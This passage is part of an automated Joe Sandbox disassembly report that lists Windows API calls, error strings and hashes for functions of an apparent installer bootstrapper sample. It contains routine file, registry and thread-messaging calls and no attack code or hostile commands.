                                                            • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                            • API String ID: 1586453840-3596319545
                                                            • Opcode ID: cd660cb292e55aa8d9c2f228d25dd98c8eb2a80dd5b77fdb5a5584a598f72750
                                                            • Instruction ID: 762702ae239a1024ea60d62ab2e6c4c819388fbade6270adb03eda5fb8f0ad20
                                                            • Opcode Fuzzy Hash: cd660cb292e55aa8d9c2f228d25dd98c8eb2a80dd5b77fdb5a5584a598f72750
                                                            • Instruction Fuzzy Hash: DA1193B2B40208BBDB21FA95DC86EBEB7B8FB10F20F804065E500EB191D6719F81D710
                                                            APIs
                                                            • lstrlenA.KERNEL32(008912CF,00000000,00000000,?,?,?,008B0013,008912CF,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F,Invalid operation for this state.), ref: 008B0776
                                                            • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,008B0013,008912CF,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F), ref: 008B07B2
                                                            • GetLastError.KERNEL32(?,?,008B0013,008912CF,008912CF,?,00000000,0000FDE9,?,008912CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008B07BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWritelstrlen
                                                            • String ID: logutil.cpp
                                                            • API String ID: 606256338-3545173039
                                                            • Opcode ID: cc54368b652c870ee1a42d4190965891596ba17a51524cf0715ef08c39d6c50e
                                                            • Instruction ID: c940e610e581ed69256645079a479aed1edb80da2f90818737680f88bebc9118
                                                            • Opcode Fuzzy Hash: cc54368b652c870ee1a42d4190965891596ba17a51524cf0715ef08c39d6c50e
                                                            • Instruction Fuzzy Hash: B0119172A41129AB83209A698D84AEFFB6CFB44760B114325FD04E7340EE71AD00CEE4
                                                            APIs
                                                            • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0087523F,00000000,?), ref: 00871248
                                                            • GetLastError.KERNEL32(?,?,?,0087523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00871252
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ArgvCommandErrorLastLine
                                                            • String ID: apputil.cpp$ignored
                                                            • API String ID: 3459693003-568828354
                                                            • Opcode ID: 67195e019901bba3ab15edb39ebd62ab5d54775089db7ff1d93bb75392c6140d
                                                            • Instruction ID: 97ac600e66956ce931046548296782b169871c001deabf1059dae0606cbd0579
                                                            • Opcode Fuzzy Hash: 67195e019901bba3ab15edb39ebd62ab5d54775089db7ff1d93bb75392c6140d
                                                            • Instruction Fuzzy Hash: AA119D76910229AB8F21DB9DC809DAEBBB8FF14750B018155FD08E7711E770DE009AA1
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0089D3EE,00000000,00000000,00000000,?), ref: 0089D1C3
                                                            • ReleaseMutex.KERNEL32(?,?,0089D3EE,00000000,00000000,00000000,?), ref: 0089D24A
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            Strings
                                                            • NetFxChainer.cpp, xrefs: 0089D208
                                                            • Failed to allocate memory for message data, xrefs: 0089D212
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                            • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                            • API String ID: 2993511968-1624333943
                                                            • Opcode ID: c72d296dcb37608d444e375619be1e3e1ab6c23c3860924cc036c4e08e43520c
                                                            • Instruction ID: 6244ec409e160fc40e6b4e25c8120724f92686aecca1719b4aa23bfd69f425f5
                                                            • Opcode Fuzzy Hash: c72d296dcb37608d444e375619be1e3e1ab6c23c3860924cc036c4e08e43520c
                                                            • Instruction Fuzzy Hash: DA11BFB1200215AFCB059FA8E881E5ABBF5FF09724F144265F924DB351C771E810CB99
                                                            APIs
                                                            • FormatMessageW.KERNEL32(0087428F,0087548E,?,00000000,00000000,00000000,?,80070656,?,?,?,0088E75C,00000000,0087548E,00000000,80070656), ref: 00871F9A
                                                            • GetLastError.KERNEL32(?,?,?,0088E75C,00000000,0087548E,00000000,80070656,?,?,008840BF,0087548E,?,80070656,00000001,crypt32.dll), ref: 00871FA7
                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0088E75C,00000000,0087548E,00000000,80070656,?,?,008840BF,0087548E), ref: 00871FEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID: strutil.cpp
                                                            • API String ID: 1365068426-3612885251
                                                            • Opcode ID: f808d72626ef3d6447d71c1f904123ecc8dd7f5be5c1de5947d8d0de9dc15c59
                                                            • Instruction ID: 931e2e2185df3d990de2b11337f286b2ef305549539a67faac661cdc60999964
                                                            • Opcode Fuzzy Hash: f808d72626ef3d6447d71c1f904123ecc8dd7f5be5c1de5947d8d0de9dc15c59
                                                            • Instruction Fuzzy Hash: BD016576911129BBDB209F98CC09AEE7BACFB04750F118165FD14F7254EB74DE0096E1
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00880791
                                                            Strings
                                                            • Failed to update resume mode., xrefs: 00880762
                                                            • Failed to update name and publisher., xrefs: 0088077B
                                                            • Failed to open registration key., xrefs: 00880748
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                            • API String ID: 47109696-1865096027
                                                            • Opcode ID: 31b16b9a862133054f4c8a663051877747f251868ed5c3c53e05b6059eb99fc6
                                                            • Instruction ID: fc7f98c6cb267311aaa9e188996bb47308f08e7926e0a2a6d42d91b8d46b6cd2
                                                            • Opcode Fuzzy Hash: 31b16b9a862133054f4c8a663051877747f251868ed5c3c53e05b6059eb99fc6
                                                            • Instruction Fuzzy Hash: 63019232A40629FBCB627684DC45FAEBA78FB00B20F100155F500E6251C776AE14AFD5
                                                            APIs
                                                            • CreateFileW.KERNEL32(008BB500,40000000,00000001,00000000,00000002,00000080,00000000,008804BF,00000000,?,0087F4F4,?,00000080,008BB500,00000000), ref: 008B4DCB
                                                            • GetLastError.KERNEL32(?,0087F4F4,?,00000080,008BB500,00000000,?,008804BF,?,00000094,?,?,?,?,?,00000000), ref: 008B4DD8
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,0087F4F4,?,0087F4F4,?,00000080,008BB500,00000000,?,008804BF,?,00000094), ref: 008B4E2C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLast
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 2528220319-2967768451
                                                            • Opcode ID: f93a43de92464dab186fe33f256972a6a28eaf453e97b5a13c643384495f0085
                                                            • Instruction ID: 4429e3e42cdfa8d86265c74d33f4462765848be8c752279d3837a6c6aee1b3e4
                                                            • Opcode Fuzzy Hash: f93a43de92464dab186fe33f256972a6a28eaf453e97b5a13c643384495f0085
                                                            • Instruction Fuzzy Hash: 1701B133681525ABD6225A6C9C06B9F3B54FB41B70F055311FF20EA3E2E770CC1292A1
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00898C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008B49AE
                                                            • GetLastError.KERNEL32(?,00898C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 008B49BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLast
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1214770103-2967768451
                                                            • Opcode ID: c86d0099b06d6d4b543943ec365da6148c6e6939ea773fbddbeb3a3869240a1d
                                                            • Instruction ID: 24f4bd17e0e648359ce5219f1816ad025384d922bfb649f0e6ddf0c535f5b3b3
                                                            • Opcode Fuzzy Hash: c86d0099b06d6d4b543943ec365da6148c6e6939ea773fbddbeb3a3869240a1d
                                                            • Instruction Fuzzy Hash: 1901A232680538B6D22126955C0BFBB2E58FB00B70F114222FF55FA3E2D7B59D1152E2
                                                            APIs
                                                            • ControlService.ADVAPI32(00896AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,00896AFD,00000000), ref: 00896C13
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00896AFD,00000000), ref: 00896C1D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ControlErrorLastService
                                                            • String ID: Failed to stop wusa service.$msuengine.cpp
                                                            • API String ID: 4114567744-2259829683
                                                            • Opcode ID: c5557045746553f21a301faddba6f8ece969ec8e713a1cf34276084b5e491e29
                                                            • Instruction ID: e7752bb4d051c0cd742abdb32ba9edaaee4ae54ffe68f5a15f197307e48f4918
                                                            • Opcode Fuzzy Hash: c5557045746553f21a301faddba6f8ece969ec8e713a1cf34276084b5e491e29
                                                            • Instruction Fuzzy Hash: 6C01FC33A4163967DB20FB699C45EABB7A4FB48B20F014129FD00FB280EA749C0185E5
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B39F4
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B3A27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: 3aa45b3c1b295d789327030e194a1ce82b5d029b4ac5b95d81dc1d689b24b830
                                                            • Instruction ID: ccc0f8fd16edde23a7a85314c573deea9f2b8b2bf544dcceb709853b21c0b69d
                                                            • Opcode Fuzzy Hash: 3aa45b3c1b295d789327030e194a1ce82b5d029b4ac5b95d81dc1d689b24b830
                                                            • Instruction Fuzzy Hash: 0601AD35A84229B7D7205A999C09EEB3BDCFF46764F20022AFC44EB340D6B4DE009692
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B396E
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B39A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: e1c312db5a3d10f3a456643399d5f2196a95a3e9d94fc27009d9e53e87324e18
                                                            • Instruction ID: c44647925e5dcf9d80e2007b2d2a39978d1cb8da4bf6835ef877cb367dd19e5c
                                                            • Opcode Fuzzy Hash: e1c312db5a3d10f3a456643399d5f2196a95a3e9d94fc27009d9e53e87324e18
                                                            • Instruction Fuzzy Hash: 6001A231284219ABD7201A988C04EFB3BDCFF42B64F10463AFD44E7340C6F4DE009692
                                                            APIs
                                                            • SysFreeString.OLEAUT32(?), ref: 008B690F
                                                              • Part of subcall function 008B8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008B8820
                                                              • Part of subcall function 008B8713: GetLastError.KERNEL32 ref: 008B882A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$ErrorFileFreeLastStringSystem
                                                            • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                            • API String ID: 211557998-1658759192
                                                            • Opcode ID: 4a92efaa49de15a23a94d86c52023114e64195c341adf20e61d7c257bda970d8
                                                            • Instruction ID: d4861b39744f6080863f8f6d9662731d4d50ab2990e4f08bc89118e1de5b3d59
                                                            • Opcode Fuzzy Hash: 4a92efaa49de15a23a94d86c52023114e64195c341adf20e61d7c257bda970d8
                                                            • Instruction Fuzzy Hash: 470162B190122AFB8B20AF89C8418EAFBA8FB14365B64417AF504EB310E7755E20D7D1
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0088ECED
                                                            • GetLastError.KERNEL32 ref: 0088ECF7
                                                            Strings
                                                            • Failed to post elevate message., xrefs: 0088ED25
                                                            • EngineForApplication.cpp, xrefs: 0088ED1B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                            • API String ID: 2609174426-4098423239
                                                            • Opcode ID: 4a7817533698c86704daf019521203ce65c07d645c47d62a8640ec6ae5807fed
                                                            • Instruction ID: 1f8cfa9536e547ade0157a4851f9ba1ec5a14a41ee558ef0edf20d909401fe62
                                                            • Opcode Fuzzy Hash: 4a7817533698c86704daf019521203ce65c07d645c47d62a8640ec6ae5807fed
                                                            • Instruction Fuzzy Hash: 94F0F633A40236ABC7206A9C9C09F967B94FF04B34B258228FE64EF281D775CC0187D5
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0087D903
                                                            • FreeLibrary.KERNEL32(?,?,008748D7,00000000,?,?,0087548E,?,?), ref: 0087D912
                                                            • GetLastError.KERNEL32(?,008748D7,00000000,?,?,0087548E,?,?), ref: 0087D91C
                                                            Strings
                                                            • BootstrapperApplicationDestroy, xrefs: 0087D8FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorFreeLastLibraryProc
                                                            • String ID: BootstrapperApplicationDestroy
                                                            • API String ID: 1144718084-3186005537
                                                            • Opcode ID: a3dfa855b1f6639c05540be07d183be8a4223d8705b3391c5b8921c498aa3da5
                                                            • Instruction ID: 17e044be736704c6424070de6c375ac0bc9984f9647743b3daa182087e03f89f
                                                            • Opcode Fuzzy Hash: a3dfa855b1f6639c05540be07d183be8a4223d8705b3391c5b8921c498aa3da5
                                                            • Instruction Fuzzy Hash: 55F06832600B26ABC3205F69D804B26FBB4FF04762701C229E929D6520D771EC108BD0
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B3200
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B3230
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: a2c808df56643d7f480e70cf2ab03ca624449cc3ee24782ce3499df0209fe844
                                                            • Instruction ID: 5426453f1e2af5fc1e367e4af8ccd00d78b1e412ccfff46c626aa7ea0e8b18df
                                                            • Opcode Fuzzy Hash: a2c808df56643d7f480e70cf2ab03ca624449cc3ee24782ce3499df0209fe844
                                                            • Instruction Fuzzy Hash: F2F0BE35181658EBC7310F849C08FAB77E8FB80B62F248129FC08EB310C7B48E1096E1
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B34AD
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B34DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: eed1693e18d91df0c975883476f8e3e6afb8012565e8394b20c5b6adbaad4ab5
                                                            • Instruction ID: c71f216671cdcb0373c28aad297db9a0ceb296376eb5edbc7afd4933c7e1e281
                                                            • Opcode Fuzzy Hash: eed1693e18d91df0c975883476f8e3e6afb8012565e8394b20c5b6adbaad4ab5
                                                            • Instruction Fuzzy Hash: 56F0B431241228A7C7331E449C08E9B77E8FB55B61F14421AFC14D7310C7B5DE5096E5
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0088F2EE
                                                            • GetLastError.KERNEL32 ref: 0088F2F8
                                                            Strings
                                                            • Failed to post plan message., xrefs: 0088F326
                                                            • EngineForApplication.cpp, xrefs: 0088F31C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                            • API String ID: 2609174426-2952114608
                                                            • Opcode ID: c4380fd48ad713c7a531e3b9a894d9ebbb2b4e9cde9b4038d3ede80b3bee4fe1
                                                            • Instruction ID: ac262a03b697987acc90828635a45885b071b291dfa4278cc512e4b04efe590a
                                                            • Opcode Fuzzy Hash: c4380fd48ad713c7a531e3b9a894d9ebbb2b4e9cde9b4038d3ede80b3bee4fe1
                                                            • Instruction Fuzzy Hash: 0EF0A733A416356BD621369AAC09E8B7F94FF04B60F014135FE54EB382E674DC0087D5
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0088F3FC
                                                            • GetLastError.KERNEL32 ref: 0088F406
                                                            Strings
                                                            • EngineForApplication.cpp, xrefs: 0088F42A
                                                            • Failed to post shutdown message., xrefs: 0088F434
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                            • API String ID: 2609174426-188808143
                                                            • Opcode ID: d59ca5e01ed8a353a51609123d956be6a33c6ab6e84535d7be019edd2ab86b6b
                                                            • Instruction ID: 8fd1b6ddace7007dd8184e9ea847f187b09f8be4b429c36d60095eef282dcbf3
                                                            • Opcode Fuzzy Hash: d59ca5e01ed8a353a51609123d956be6a33c6ab6e84535d7be019edd2ab86b6b
                                                            • Instruction Fuzzy Hash: 2AF0A733A4163567C63126996C0DF877B94FF04B60B014136BE14FB292E675DC0087D5
                                                            APIs
                                                            • SetEvent.KERNEL32(008BB478,00000000,?,00891717,?,00000000,?,0087C287,?,00875405,?,008875A5,?,?,00875405,?), ref: 008907BF
                                                            • GetLastError.KERNEL32(?,00891717,?,00000000,?,0087C287,?,00875405,?,008875A5,?,?,00875405,?,00875445,00000001), ref: 008907C9
                                                            Strings
                                                            • Failed to set begin operation event., xrefs: 008907F7
                                                            • cabextract.cpp, xrefs: 008907ED
                                                            Memory Dump Source
